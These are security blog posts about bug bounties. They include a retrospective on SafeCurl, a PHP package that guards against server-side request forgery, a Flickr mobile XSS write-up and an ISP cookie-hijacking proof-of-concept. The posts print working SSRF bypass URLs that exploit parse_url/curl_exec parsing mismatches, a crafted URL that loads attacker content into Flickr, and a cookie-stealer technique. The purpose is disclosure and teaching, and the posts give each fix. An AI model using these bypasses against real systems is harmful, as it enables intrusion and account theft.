Occasionally I’ll get an email from someone interested in getting involved in bug bounties. Whilst some people are quite protective about giving out information - nervous that having more people participating leaves less bugs, I believe that the more people involved the better. Getting paid for issues and gaining credibility is great, but the end goal should be to improve web security as a whole.

I thought it’d be useful to compile some of the information I give out (as opposed to typing it out each time), and some tips for people starting out. If you have anything to add, shoot me a message and I’ll update this page.

For anyone already working in web application security this is probably a bit too beginner for you.

Bug Bounties

Bug bounties, also known as responsible disclosure programmes, are setup by companies to encourage people to report potential issues discovered on their sites. Some companies chose to reward a researcher with money, swag, or an entry in their hall-of-fame. If you’re interested in web application security then they’re a great way of honing your skills, with the potential of earning some money and/or credibility at the same time.

Required Reading

There is one book that everyone recommends, and rightly so - The Web Application Hackers Handbook, which covers the majority of common web bugs, plus it uses Burp Suite in the examples.

The OWASP Top Ten has a high-level overview of the most common web application bugs.

Blogs

Quite a few people, me included, blog about issues they find. This is a great insight into the type of bugs that exist on sites, plus they’re always an interesting read. These are the ones I can remember off the top of my head.

Toolset

I’ll admit, I don’t use many tools, a lot of the time I’ll write a quick PHP/Python script. I should, it’d make my sessions more efficient, but these are the core ones I use all the time.

One thing to note is that automated scanners (such as Acunetix or Nikto) generate a lot of noise. Most programmes forbid the use of them for this reason. Plus you’re highly unlikely to find something with such a scanner that no one else has found.

  • Burp Suite - An intercepting proxy which lets you modify requests on the fly, replay requests and so on.
  • Nmap - Useful for finding additional web servers to investigate (providing the scope of the programme is wide enough)
  • DNS-Discovery - Find additional sub-domains to investigate

Intentionally Vulnerable Applications

Applications/systems which have vulnerabilities added to them are a fun way of testing out some techniques. You might find pages outputting user data without escaping (leading to XSS), or code which executes SQL queries in an insecure manner (leading to SQL Injection).

Programmes

There are a lot of sites running a responsible disclosure programme now. The big ones are Facebook, Google, Yahoo and PayPal.

If you start looking for bugs on the above sites you might be looking for a good week or two without finding anything, since they’ve been around for a while. One option is to find a smaller site or a new bounty, which probably won’t have had as many people looking at it.

A good tip is to signup for one of the many sites which host bounties on behalf of other companies. This lets you submit reports in a common format and track the progress - easier than emailing for updates.

Reporting

When submitting a bug, you need to realise that different companies have different time frames for triaging and patching issues. Combined with the volume of reports, you may have to wait a few days/a week for a response. If you first language isn’t English, then it might be wise to submit a short video explaining it.

Don’t be afraid to send in a report, but you’ll have to understand that the severity and impact that you think the bug has could be very different to how the security team views it. As time goes on, you’ll get a feel for what is an issue and what isn’t.

Facebook has compiled a list of the most common false-positives reported.

It’s been a week since I launched the SafeCurl “Capture the Bitcoins” contest, which has been a fun, but humbling event.

Whilst I work as Security Engineer, and submitted my first bug bounty entry two years ago, I come from a development background. I’ve been writing PHP coming up to nine years now, though nothing much in production for the past year and a half.

I wanted to take a break from searching for bugs, so decided to write some PHP (the language I surprisingly love). SafeCurl seemed like a great starting point - a useful package, not too large, and still involving web app security.

Once written, I launched the bounty. Primarilly to give it a thorough test, and partly because I wanted to see what it would be like receiving bug reports rathering than submitting them.

In my head, I’d assumed that it would take ages for someone to bypass my code (if it happened at all). In reality, it took 2 hours. The reason being that I had rushed the project, excited to get it released as soon as possible. Further investigation should have been done at the start, which would have stopped such a silly bypass being possible.

Initially, there was going to be one 0.25B⃦ bounty. However, if the prize was won before most people had seen the site, there’s less incentive to keep looking. So I re-filled the wallet, and assumed this time no one would find a bypass.

I paid out another 0.1B⃦ to two people suggesting a DNS rebinding attack may be possible. Whilst this was just a theory, I created a hot-fix to pin DNS in cURL.

Then, three more 0.25B⃦ bounties caused by inconsistencies in PHP’s URL parsing and the curl_exec function. After the first two were paid out, I declared the bounty over. However, the third was so similar to the previous two, it was only fair to pay out (from my personal wallet).

I’ve rewarded an additional 0.95B⃦ than I’d planned, and I don’t have infinite Bitcoins, but it was worth the money.

Bypasses

As I mentioned above, this was a stupid mistake. In the code, I’d blacklisted certain private ranges (127.0.0.1/32, 10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16), but 0.0.0.0 could also be used to refer to localhost.

The solution was pretty simple - blacklist any reserved ranges.

Found by @zoczus.

DNS Rebinding

I was made aware that my code wasn’t safe from a DNS rebinding attack. This would involve rapidly switching the A record for the domain name from a valid IP (which passes any checks), to an internal IP. Whilst this is theoretical, I’ve played around with it but couldn’t get it to exploit, it was 1am and didn’t want to risk it whilst I was asleep.

Two separate people raised it at the same time. Whilst I could have just paid the first, I thought it’d be fair to pay both since they came up with it independently (the Facebook attitude).

For this, the IP returned from gethostbynamel is pinned by replacing the hostname in the URL with the IP, then passing the original hostname in the HTTP “Host” header.

Found by @47696d6569 and rynac.

URL parsing issue #1

This was an interesting one. Whilst the btc.txt file couldn’t be accessed, it did bypass all other checks of SafeCurl so was worthy of the bounty. Passing http://user:pass@safecurl.fin1te.net?@google.com to parse_url causes google.com to be returned (PHP sees pass@safecurl.fin1te.net? as the password). However, when the full URL is given to curl_exec, it sees safecurl.fin1te.net as the host, and @google.com/ as the query string. Pretty cool trick.

A quick solution for this was to disable the use of credentials in the URL. This worked, until the next bypass was found.

Found by @shDaniell.

URL parsing issue #2

Similar to the previous, passing http://validurl.com#user:pass@safecurl.fin1te.net causes parse_url to see validurl.com as the host, and user:pass@safecurl.fin1te.net as the fragment. Like before, curl_exec handles this differently and uses safecurl.fin1te.net.

This was patched by using rawurlencode on the username, password and fragment to prevent the URL getting parsed differently.

Found by Marcus T.

URL parsing issue #3

And the last one was again very similar. I didn’t URL encoded the query string, so http://google.com?user:pass@safecurl.fin1te.net was used to bypass the check.

The path and query string are now URL encoded too, with certain characters (& = ; [ ]) left intact, else the receiving may not parse it properly.

Found by @iDeniSix.

Lessons Learnt

Lesson #1 - Don’t Rush

The first issue, along with typos, were caused by me rushing the project. These could have been prevented by taking it a bit slower, and by doing a proper design and investigation phase before starting development.

Lesson #2 - Bug Bounties are a Great Idea

Had I launched my code straight into production, without having ~1,000,000 attempts to bypass it, would have meant that the issues above would not have been fixed, thus causing vulnerable code to be deployed.

There is a price to pay, namely the Bitcoins I paid out, but this is nothing compared to the cost of someone using it for malicious purposes.

Lesson #3 - Have Unit Tests, Get Code Reviews

This is something I’ve learnt from development in “real-life”. Unfortunately I didn’t apply this to my own project (partly because it was just me working on it, partly because of Lesson #1). Unit tests do seem a bit of a chore to write sometimes, but they can catch a lot of bugs being re-introduced in the codebase. Plus having someone look over your code from a different perspective is invaluable.

Lesson #4 - You’re Not as Good as You Think

This may sound like a horrible lesson, but it’s not. Having something “secure” you wrote be ripped to shreds is a really awesome thing. It makes you realise that there may be gaps in your knowledge, and you now know where they are, and how to fix them. I’m really excited to launch another for this exact reason.

Going Forward

SafeCurl version 2 will be released shortly. This will include real unit tests covering the code, and test cases for each of the bypasses (and any other techniques I can find). Plus, experimental IPv6 support will be added.

Another bounty will be launched at some point. Whether it’s a SafeCurl bounty, or another concept, I’ve not decided.

I will also be looking to port SafeCurl to other languages such as Java, Python, Ruby, etc. This will be more of a challenge, since my strongest skills lie with PHP. If anyone wants to help out drop me a message.

Statistics

A great part of the event was looking inside the Apache access logs to see some of the attempts people were making. I’ve included statistics, if you’re curious.

Total attempts 1,140,803

Average attempts per person 651

Average attempts per person (Excluding top 10) 20

Server-Side Request Forgery attacks involve getting a target server to perform requests on our behalf. Rather than covering some great material already published, this post will be to introduce a new PHP package designed to help prevent these sort of attacks.

Protections

To protect our scripts from being abused in this way, we simply validate any URL or file path being passed to functions which can send requests. Of course, this is easier said than done.

The first step is to validate the provided scheme (and port if specified). This is to stop requests to PHP’s extra protocols (php://, phar://) which would let an attacker read files off of the file system.

The second is to validate the URL itself. This is to make sure that someone isn’t requested a blacklisted domain (such as https://jira.fin1te.net), or a private/loopback IP (such as 127.0.0.1). You should also resolve any domain names to their IP addresses, and validate these to make sure someone doesn’t use a DNS entry pointing to an invalid IP.

Lastly, any redirects which cURL would normally handle should be caught, and the URL specified in the Location header validated using the above steps.

Putting this all together, we get SafeCurl.

SafeCurl

SafeCurl has been designed to be a drop in replacement for the curl_exec function in PHP. Whilst there are other functions in PHP which can be used to grab the contents of a URL (file_get_contents, fopen, include), curl_exec is the most popular. In future versions, support for other functions will be added.

To use SafeCurl, simply call the SafeCurl::execute method where you’d usually call curl_exec, wrapping everything in a try/catch block.

By default, SafeCurl will only allow HTTP or HTTPS requests, to ports 80, 443 and 8080, which don’t resolve to a private/loopback IP address.

If you wish to specify additional options, instantiate a new Options object and pass in your custom rules. Domains are accepted in regular expression format, and IPs in CIDR notation.

More usage information is available on the Github project. If you find any issues please raise them, or better yet, submit a pull request.

If you manage to find a way of bypassing it completely, then please participate in the bounty.

Bounty (Capture the Bitcoins)

In order to give SafeCurl a real-world test, I’ve hosted a demo site, which lets you try out the different protections.

The document root contains a Bitcoin private key, with 0.25BTC contained within. This file is only accessible from localhost, so if you do bypass it, grab the file and the Bitcoins are yours.

The source code for the site is also available, if you’re interested.

For more information see the Bounty page.

I recently found an XSS on the mobile version of Flickr (http://m.flickr.com). Due to the way the bug is triggered, I thought it deserved a write-up.

Whilst browsing the site, you’ll notice that pages are loaded via AJAX with the path stored in the URL fragment (not as common these days now that pushState is available).

When the page is loaded, a function, q() (seen below), is called which will check the value of location.hash, and call F.iphone.showSelectedPage().

In order to load pages from the current domain, it checks for a leading slash. If this isn’t present, it prepends one when calling the next function, F.iphone.showPageByHref().

This function then performs a regex on the URL (line 160) to ensure that it’ll only load links from m.flickr.com. If this check fails, and the URL starts with a double slash (relative protocol link), it prepends it with http://m.flickr.com. Pretty solid check, right?

Incase you didn’t notice, the first regex doesn’t anchor it to the start of the string. This means we can bypass it providing our own URL contains m.flickr.com.

We can get our own external page loaded by passing in a URL like so:

//fin1te.net/flickr.php?bypass=m.flickr.com

The code will check for a leading slash (we have two :)), which it’ll pass, then checks for the domain, which will also pass, then load it via AJAX.

Since we now have CORS in modern browsers, the browser will send an initial OPTIONS request to the page (to ensure it’ll allow it to be loaded), then the real request.

All we need to do is specify a couple of headers (the additional options in the Access-Control-Allow-Headers are to prevent syntax errors in the Javascript), along with our payload.

The next part of the Javascript dumps the response into an element with innerHTML.

Which leads to our payload being executed.

Fix

This issue is now fixed by anchoring the regex to the start of the string, and also running another regex to check if it starts with a double slash.

tl;dr: ISPs, please reduce your cookie scope.

Everyone now knows that hosting user generated content on a sub-domain is bad. Attacks have been demonstrated on sites such as GitHub, and it’s why Google uses googleusercontent.com.

But what if you’re an ISP. You might not host any user-content, however, you probably assign customers an IP which has Reverse DNS set. You’ll probably see hostnames like

1
1-1-1-1-ip-static.hfc.comcastbusiness.net
or
1
2.2.2.2.threembb.co.uk
.

This isn’t really an issue. The issue is when the hostname assigned is a sub-domain of your own site. If you do this, along with cookies with loose domain scope (fairly common practice), and forward DNS (again, fairly common), then this combination can result in cookie stealing, and therefore account hijacking.

To pull this off, an attacker either needs to be a customer of the ISP they’re targeting, or have access to a machine of a customer (pretty easy with the use of botnets). A web server is then hosted on the connection, and referenced by the hostname assigned (as opposed to the IP).

Example

Rather than showing a real world example, I’d rather keep the companies names private, I’ve setup a proof-of-concept.

We have a fake ISP hosted on fin1te-dsl.com, which mimics an ISPs portal. Registering an account and logging in generates a session cookie (try it out).

We also have a site (152-151-64-212.cust.dsl.fin1te-dsl.com) which in real life would be hosted on a users own connection. A page, 152-151-64-212.cust.dsl.fin1te-dsl.com/debug.php, is hosted to display the cookies back for debug purposes.

Now, we just need a user who has a session to submit a request to our own site and we can grab them. Since we’re accessing the cookies via the HTTP request and not via Javascript, we can write a quick stealer which sets a content-type of

1
image/jpeg
and embed the image on a page.

And the cookies show up in the logs.

We just need to set our own cookie to this value and we’ve successfuly hijacked their session.

Out of the four major UK ISPs I tested, two were vulnerable (now patched). If you assume an equal market share (based on 2012 estimates), that’s approximately 10.5 million users who can be potentially targeted. Of course, they have to be logged in - but you can always embed the cookie stealer as an image on a support forum, for example.

Mitigation Techniques

We have three mitigation options. The first is to remove super cookies and restrict the scope to a single domain. This may be impractical if you separate content onto different sub-domains. The second is to disable forward DNS for customers. And the third is to change the hostname assigned to one which isn’t a sub-domain.

In addition, techniques such as pinning a session to an IP address will help to an extent. Unless you store a CSRF token in a cookie, in which case, we can just CSRF the user.

Source

If you want to browse the source code of the proof-of-concept, it’s available on Github.

Note

Since I didn’t have the time to test every single ISP in the world (just the UK ones) for the three requirements that make them vulnerable, I decided to send an email to

1
security@
addresses at the top 25 ISPs - 20 of these bounced, and I received no reply from the other 5.

The two UK ones I originally contacted patched promptly and gave good updates, so kudos to you two.